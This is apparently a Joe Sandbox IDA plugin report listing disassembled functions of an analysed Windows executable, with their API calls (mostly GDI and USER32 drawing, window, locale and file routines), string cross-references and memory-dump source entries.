GetDC.USER32(00000000), ref: 0043B907
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043B92B
ReleaseDC.USER32(00000000,00000000), ref: 0043B936
CreateCompatibleDC.GDI32(00000000), ref: 0043B93D
SelectObject.GDI32(00000000,?), ref: 0043B94D
BeginPaint.USER32(00000000,?), ref: 0043B96F

Part of subcall function 0043B8BC: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043B9CB
Part of subcall function 0043B8BC: EndPaint.USER32(00000000,?), ref: 0043B9DC
Part of subcall function 0043B8BC: SelectObject.GDI32(00000000,?), ref: 0043B9F6
Part of subcall function 0043B8BC: DeleteDC.GDI32(00000000), ref: 0043B9FF
Part of subcall function 0043B8BC: DeleteObject.GDI32(?), ref: 0043BA08

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00407134, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0040714C
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407158
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407167
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407173
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004071AF

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 00407162
Magellan MSWHEEL, xrefs: 00407142
MouseZ, xrefs: 00407147
MSH_SCROLL_LINES_MSG, xrefs: 0040716E
MSWHEEL_ROLLMSG, xrefs: 00407153

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043B538, Relevance: 15.2, APIs: 10, Instructions: 177

APIs

RectVisible.GDI32(?,?), ref: 0043B5F1
SaveDC.GDI32(?), ref: 0043B607

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
RestoreDC.GDI32(?,?), ref: 0043B645

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
FrameRect.USER32(?,?,?), ref: 0043B6F9
DeleteObject.GDI32(?), ref: 0043B703
CreateSolidBrush.GDI32(00000000), ref: 0043B713
FrameRect.USER32(?,00000000,?), ref: 0043B746
DeleteObject.GDI32(?), ref: 0043B750

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00402A68, Relevance: 15.1, APIs: 10, Instructions: 129

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402AF0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B14
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B30
ReadFile.KERNEL32(?,?,00000080,?,00000000), ref: 00402B51
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402B7A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402B88
GetStdHandle.KERNEL32(000000F5), ref: 00402BC3
GetFileType.KERNEL32 ref: 00402BD9
CloseHandle.KERNEL32 ref: 00402BF4
GetLastError.KERNEL32(000000F5), ref: 00402C0C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00452694, Relevance: 15.1, APIs: 10, Instructions: 74

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004526DF
DeleteMenu.USER32(00000000,0000F130,00000000), ref: 004526FD
DeleteMenu.USER32(00000000,00000007,00000400), ref: 0045270A
DeleteMenu.USER32(00000000,00000005,00000400), ref: 00452717
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00452724
DeleteMenu.USER32(00000000,0000F020,00000000), ref: 00452731
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0045273E
DeleteMenu.USER32(00000000,0000F120,00000000), ref: 0045274B
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00452769
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00452785

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043491C, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139

APIs

Part of subcall function 00434D54: WindowFromPoint.USER32(=LC,?), ref: 00434D5A
Part of subcall function 00434D54: GetParent.USER32(00000000), ref: 00434D71

GetWindow.USER32(00000000,00000004), ref: 0043493E
GetCurrentThreadId.KERNEL32(004348B0,?,00000000,00000004,?,-0000000C,?), ref: 00434A12
EnumThreadWindows.USER32(00000000,004348B0,?), ref: 00434A18
GetWindowRect.USER32(00000000,?), ref: 00434A2F
IntersectRect.USER32(?,?,?), ref: 00434A9D

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

Strings

41C, xrefs: 004349D2
=LC, xrefs: 004349FA, 00434A3B, 00434A43, 00434A34
=LC, xrefs: 0043492B, 004349A3, 004349CC, 004349E1, 004349B0

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00409E60, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50

APIs

Part of subcall function 00409CD8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
Part of subcall function 00409CD8: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 00409EA0
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?), ref: 00409EA6
GetStdHandle.KERNEL32(000000F5,00409F10,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 00409EBB
WriteFile.KERNEL32(00000000,000000F5,00409F10,00000002,?), ref: 00409EC1
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 00409EE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00409EF9

Strings

H@F, xrefs: 00409E74
\s@, xrefs: 00409ECF

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00436BAC, Relevance: 13.6, APIs: 9, Instructions: 150

APIs

MulDiv.KERNEL32(?,?,?), ref: 00436BE5
MulDiv.KERNEL32(?,?,?), ref: 00436BFF
MulDiv.KERNEL32(?,?,?), ref: 00436C2D
MulDiv.KERNEL32(?,?,?), ref: 00436C43
MulDiv.KERNEL32(?,?,?), ref: 00436C7B
MulDiv.KERNEL32(?,?,?), ref: 00436C93
MulDiv.KERNEL32(?,?,0000001F), ref: 00436CDD
MulDiv.KERNEL32(?,?,0000001F), ref: 00436D06

Part of subcall function 0041ED20: MulDiv.KERNEL32(00000000,00000048,?,?), ref: 0041ED31

MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436D2C

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00437A40, Relevance: 13.6, APIs: 9, Instructions: 122

APIs

GetDesktopWindow.USER32 ref: 00437A77
GetDCEx.USER32(?,00000000,00000402), ref: 00437A8A

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

SelectObject.GDI32(?,00000000), ref: 00437AAD
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AD3
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AF5
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,?,?,00000000,?,005A0049,?,?,?,?), ref: 00437B14
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?,?,00000000), ref: 00437B2E
SelectObject.GDI32(?,?), ref: 00437B3B
ReleaseDC.USER32(?,?), ref: 00437B55

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040ACCC, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040AB58: GetThreadLocale.KERNEL32 ref: 0040AB82
Part of subcall function 0040AB58: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000004A), ref: 0040AC77
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040981C: GetThreadLocale.KERNEL32(00000000,0040992F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409838

GetThreadLocale.KERNEL32(00000000,0040AF97,?,?,00000000,00000000), ref: 0040AD02

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Part of subcall function 004097B8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Part of subcall function 00409AA4: GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 004099F4: GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Strings

AMPM , xrefs: 0040AF25
AMPM, xrefs: 0040AF16
mmmm d, yyyy, xrefs: 0040ADFE
m/d/yy, xrefs: 0040ADD1
:mm:ss, xrefs: 0040AF52
:mm, xrefs: 0040AF35

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00456E3C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132

APIs

GetActiveWindow.USER32 ref: 00456E4F
GetWindowRect.USER32(?,?), ref: 00456EA9
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456EE1

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

MessageBoxA.USER32(?,?,?,?), ref: 00456F22
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456F72

Part of subcall function 0044DE40: IsWindow.USER32(?), ref: 0044DE4E
Part of subcall function 0044DE40: EnableWindow.USER32(?,000000FF), ref: 0044DE5D

SetActiveWindow.USER32(?), ref: 00456F83

Strings

(, xrefs: 00456E86

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004225B6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004225B8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041B680, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89

APIs

GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Strings

H#A, xrefs: 0041B6B2
0@F, xrefs: 0041B68E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00426864, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004268BC
GetSystemMetrics.USER32(00000000), ref: 004268D1
GetSystemMetrics.USER32(00000001), ref: 004268DC
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426906

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

dhB, xrefs: 00426881, 0042688E, 00426895
DISPLAY, xrefs: 004268FD
GetMonitorInfoW, xrefs: 0042687C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004266BC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68

APIs

GetMonitorInfoA.USER32(?,?), ref: 004266ED
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426714
GetSystemMetrics.USER32(00000000), ref: 00426729
GetSystemMetrics.USER32(00000001), ref: 00426734
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042675E

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

GetMonitorInfo, xrefs: 004266D4
DISPLAY, xrefs: 00426755

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00401B18, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,i ), ref: 00401B45
LocalFree.KERNEL32 ref: 00401B57
VirtualFree.KERNEL32(?,00000000,00008000,002FBBB0,00000000,i ), ref: 00401B76
LocalFree.KERNEL32 ref: 00401BB5
RtlLeaveCriticalSection.KERNEL32(004645C4,00401BF5,002FBBB0,00000000,i ), ref: 00401BDE
RtlDeleteCriticalSection.KERNEL32(004645C4,00401BF5,002FBBB0,00000000,i ), ref: 00401BE8

Strings

i , xrefs: 00401B2C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004040B8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0045BD1C,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F,?,00000000), ref: 004040F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0045BD1C), ref: 004040F7
GetStdHandle.KERNEL32(000000F5,00404140,00000002,0045BD1C,00000000,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F), ref: 0040410C
WriteFile.KERNEL32(00000000,000000F5,00404140,00000002,0045BD1C), ref: 00404112
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404130

Strings

Runtime error at 00000000, xrefs: 004040EA, 00404129
Error, xrefs: 00404124

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00444488, Relevance: 12.2, APIs: 8, Instructions: 170

APIs

6D37D9B4.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 004444E7

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

6D37D9B4.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00444588
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004445D5
SetBkColor.GDI32(00000000,00000000), ref: 004445DD
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00444602
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00444623
SetBkColor.GDI32(00000000,00000000), ref: 0044462B
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0044464E

Part of subcall function 00444460: 6D384419.COMCTL32(00000000,?,004444C1,00000000,?), ref: 00444476

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0042ECEC, Relevance: 12.1, APIs: 8, Instructions: 146

APIs

GetDC.USER32(00000000), ref: 0042ED16

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

SelectObject.GDI32(00000000,00000000), ref: 0042ED27
GetTextMetricsA.GDI32(00000000,?), ref: 0042ED33
SelectObject.GDI32(00000000,00000000), ref: 0042ED3A
ReleaseDC.USER32(00000000,00000000), ref: 0042ED42
BeginDeferWindowPos.USER32(00000000), ref: 0042ED9A
DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EE41
EndDeferWindowPos.USER32(?), ref: 0042EE6F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00453978, Relevance: 12.1, APIs: 8, Instructions: 138

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetCapture.USER32(00000000,00453C08), ref: 004539EE
GetCapture.USER32(0000001F,00000000,00000000,00000000,00453C08), ref: 004539FD
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00453A03
ReleaseCapture.USER32 ref: 00453A08
GetActiveWindow.USER32 ref: 00453A17

Part of subcall function 00454DE0: GetCursorPos.USER32 ref: 00454DFB
Part of subcall function 00454DE0: WindowFromPoint.USER32(?,?), ref: 00454E08
Part of subcall function 00454DE0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
